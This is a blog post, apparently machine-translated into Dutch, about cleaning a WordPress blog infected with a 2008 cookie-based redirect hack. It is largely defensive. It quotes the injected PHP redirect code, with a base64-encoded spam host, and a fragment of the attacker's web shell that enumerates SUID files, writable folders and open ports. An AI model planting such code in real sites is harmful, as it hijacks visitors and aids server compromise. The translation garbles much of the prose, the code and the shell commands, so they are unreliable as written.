Virus blogosphere… maar wat had je bij mij ?!

In de afgelopen maand heb ik ontvangen waarschuwingen virus in blog van sommige bezoekers. Aanvankelijk heb ik negeerde de waarschuwingen, omdat ik installeerde een vrij goede antivirus (Kaspersky AV 2009) En zelfs blog voor een lange tijd, ik heb nooit een virus alert (lang geleden .. zag ik iets vermoeden dat de eerste refresh verdwenen. Eindelijk ...).
Langzaam begon tot grote variaties zien bezoekersverkeerNa die onlangs gedaald gestaag verkeer en begon te worden meer en meer mensen vertellen me dat stealthsettings.com het virused. Gisteren kreeg ik van iemand een screenshot gedaan wanneer antivirus geblokkeerd een script op stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Het was behoorlijk overtuigend voor mij, dus ik alle bronnen doorzocht zetten. Het eerste idee dat bij me opkwam was te doen upgrade de laatste WordPress (2.5.1), maar niet voordat de oude script om alle bestanden van WordPress wilt verwijderen en back-up database. Deze procedure werkte niet en het kostte me waarschijnlijk veel tijd om erachter te komen waar de bug was, als hij het me niet had verteld. in een discussie over koffie, vond hij Google en het zou goed zijn om hem te zien.
MyDigitalLife.info, publiceerde een artikel met de titel: "WordPress Hack: Herstellen en Fix Google en Search Engine of Nee Cookie Verkeer doorgestuurd naar Your-Needs.info, AnyResults.Net, Golden-Info.net en andere illegale sites"Dat is het einde van de draad die ik nodig had.
Het gaat over een exploiteren WordPress op basis van cookiesWaarvan ik denk dat is zeer complex en maakte het boek. Slim genoeg om een ​​te maken SQL Injection Database blog, naar een onzichtbare gebruiker te maken een eenvoudige routine controle Dashboard->Gebruikers, Controleer de server mappen en bestanden "schrijfbaar" (Met chmod 777), te zoeken en te uitvoeren bestanden met de privileges van de groep of de wortel. Ik weet niet wie gebruik maken van de naam en het zien dat er enkele artikelen geschreven over hem, ondanks het feit dat veel blogs zijn geïnfecteerd, waaronder Roemenië. Ok ... Ik zal proberen om te proberen om algemeenheden over het virus uit te leggen.

Wat is virus?

Plaats eerst de bronnen pagina's op blogs, links onzichtbaar voor bezoekers, maar zichtbaar en indexeerbaar voor zoekmachines, met name Google. Op deze manier overdracht Page Rank plaatsen aangeduid door de aanvaller. Ten tweede wordt er nog een ingevoegd omleiding code URL voor bezoekers uit Google, Live, Yahoo, ... of een RSS-lezer en niet de site in koekje. Een antivirus detecteert de redirect als Trojan-Clicker.HTML.

Symptomen:

Verminderde enorme bezoekersverkeerVooral op blogs waar de meeste bezoekers vandaan komen Google.

Identificatie: (Vandaar compliceren het probleem voor degenen die niet weten hoe hoe phpmyadmin, php en linux)

LA. WAARSCHUWING! Maak eerst een back-up database!

1. Controleer de bronbestanden index.php, header.php, footer.php, Het thema van de blog en kijk of er een code die gebruikmaakt van codering base64 of bevat "if ($ ser ==" 1? && sizeof ($ _ COOKIE) == 0) "in de vorm:


$ Seref = array ("google", "msn", "leven", "altavista"
"Vraag", "yahoo", "AOL", "cnn", "weer", "alexa");
$ Ser = 0; foreach ($ Seref als $ ref)
if (strpos (strtolower
($ _SERVER ['HTTP_REFERER']), $ verw) == false) {$ ser = "1;? Break;}!
if ($ ser == ”1? && sizeof ($ _ COOKIE) == 0) {header (” Location: http: // ”.base64_decode (” YW55cmVzdWx0cy5uZXQ = ”).” / ”); Uitgang;
}?>

... Of zoiets. Verwijder deze code!

Klik op de foto ...

code index

In de bovenstaande schermafbeelding heb ik per ongeluk en " ". Die code moet blijven.

2. Gebruiken phpMyAdmin en ga naar de database tabel wp_usersWaar controleren of er geen gebruikersnaam gemaakt op 00:00:00 0000-00-00 (Mogelijk in veld USER_LOGIN schrijven "WordPress". Let op de gebruikers-ID (veld ID) en verwijder het.

Klik op de foto ...

nep-gebruiker

* De groene lijn moet worden verwijderd en behield zijn ID. Bij Was ID = 8 .

3. Ga naar de tabel wp_usermeta, Waar je gelegen en verwijderen lijnen ID (waar het veld user_id ID-waarde wordt verwijderd).

4. In Tabel wp_option, Go active_plugins en zie wat plug-in is verdachte ingeschakeld. Het kan gebruikt worden als eindes _old.giff, _old.pngg, _old.jpeg, _new.php.giff, enz. combinaties van nep-afbeeldingsextensies met _old en _new.

SELECTEER * VAN wp_options WHERE option_name = 'active_plugins'

Verwijder deze plug-in en ga vervolgens naar de blog -> Dashboard -> Plug-ins, waar je elke plug-in deactiveert en activeert.

Klik op de afbeelding om te zien lijkt het erop active_plugins virus bestand.

inpluggen

Volg het pad op de FTP of SSH, aangegeven in active_plugins en verwijder het bestand van de server.

5. Ook in phpMyAdmin in tabel wp_option, Zoek en verwijder de regel met "rss_f541b3abd05e7962fcab37737f40fad8'En'internal_links_cache ".
In internal_links_cache, aangeboden versleutelde spam links die worden weergegeven in een blog Google Adsense code, De hacker.

6. Wordt aanbevolen wachtwoord wijzigen Blog en login verwijder alle verdachte userele. Upgrade naar de nieuwste versie van WordPress en de blog niet de inschrijving van nieuwe gebruikers in te stellen. Er is geen verlies ... kunnen reageren en onlogisch.

Ik heb hierboven geprobeerd om een ​​beetje uit te leggen, wat te doen in een dergelijke situatie, om de blog van dit virus op te schonen. Het probleem is veel ernstiger dan het lijkt en nog lang niet opgelost, omdat ze worden gebruikt beveiligingsproblemen het hosten van de webserver, die blog.

Als eerste maatregel van veiligheid, met toegang SSH, Maak een aantal controles op de server om te zien of er bestanden zoals * _old * en * _Nieuw. * Met eindes.Giff,. jpeg,. pngg,. jpgg. Deze bestanden moeten worden verwijderd. Als u de naam van een bestand, bijvoorbeeld. top_right_old.giff in top_right_old.phpWe zien dat het bestand is precies de exploit code-server.

Enkele handige instructies voor het controleren, schoonmaken en beveiligen van de server. (via SSH)

1.  cd / tmp en controleer of er mappen, zoals tmpVFlma of verwijderen andere combinaties asemenatoare naam en het. Zie de screenshot hieronder, twee van dergelijke mappen voor mij:

tmpserver

rm-rf mapnaam

2. Controleer elimiati (veranderende chmod-mail) mappen met attributen als mogelijk chmod 777

vind alle schrijfbare bestanden in de huidige dir: Zoeken. -Type f-perm-2-ls
vind alle schrijfbare mappen in de huidige dir: Zoeken. -Type d-perm-2-ls
vind alle schrijfbare mappen en bestanden in de huidige dir: Zoeken. -Perm-2-ls

3. Op zoek naar verdachte bestanden op de server.

vind. -naam "* _new.php *"
vind. -naam "* _old.php *"
vind. -naam "* .jpgg"
vind. -naam "* _giff"
vind. -naam "* _pngg"

4, WAARSCHUWING! de bestanden die zijn ingesteld beetje SUID si SGID. Deze bestanden uit te voeren met de bevoegdheden van de gebruiker (groep) of wortel, niet de gebruiker die het bestand uit te voeren. Deze bestanden kunnen leiden tot wortel compromis, als veiligheidsvraagstukken. Als je niet de SUID en SGID bestanden te gebruiken met bits, uit te voeren 'chmod 0 " hen of verwijderen pakket die ze bevatten.

Wordt misbruikt ergens in de bron ...:

if (! $ safe_mode) {
if ($ os_type == 'nix') {
$ os. = execute ('sysctl -n kern.ostype');
$ os. = execute ('sysctl -n kern.osrelease');
$ os. = execute ('sysctl -n kernel.ostype');
$ os. = execute ('sysctl -n kernel.osrelease');
if (empty ($ user)) $ user = execute ('id');
$ Aliassen = array (
"=>",
'vind suid files '=>' zoek / -type f -perm -04000 -ls ',
'vind sgid files '=>' zoek / -type f -perm -02000 -ls ',
'vind alles beschrijfbaar files in de huidige map '=>' find. -type f -perm -2 -ls ',
'vind alle beschrijfbare mappen in de huidige map' => 'find. -type d -perm -2 -ls ',
'vind alle beschrijfbare mappen en files in de huidige map '=>' find. -perm -2 -ls ',
'show geopende poorten' => 'netstat -an | grep -i luister ',
);
Else {}
$ os_name. = execute ('bekijk');
$ user. = execute ('echo% gebruikersnaam%');
$ Aliassen = array (
"=>",
'show runing services' => 'net start',
'show process list' => 'takenlijst'
);
}

Vindt op die manier ... in principe inbreuken op de beveiliging. Poorten openen directory "schrijfbaar" en de groep uitvoering privileges bestanden / root.

Terug met meer ...

Besmet sommige blogs: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / blog /,

www.mirabilismedia.ro / blog, Blog.einvest.ro
... De lijst gaat maar door ... veel.

U kunt controleren of een blog is geïnfecteerd met behulp van de Google-zoekmachine. kopiëren plakken:

Site: www.blegoo.com kopen

Goedenacht en verhoog tot ;) werken Binnenkort kom ik naar Eugene nieuws op prevezibil.imprevizibil.com.

brb :)

OM: LET OP! WordPress thema wijziging of upgrade naar WordPress 2.5.1, geen oplossing om zich te ontdoen van dit virus.

Virus blogosphere… maar wat had je bij mij ?!

Over de auteur

heimelijkheid

Gepassioneerd door alles wat gadget en IT is, schrijf ik met plezier op stealthsettings.com sinds 2006 en ik vind het leuk om met jullie nieuwe dingen te ontdekken over computers en besturingssystemen macOS, Linux, Windows, iOS en Android.

Laat een bericht achter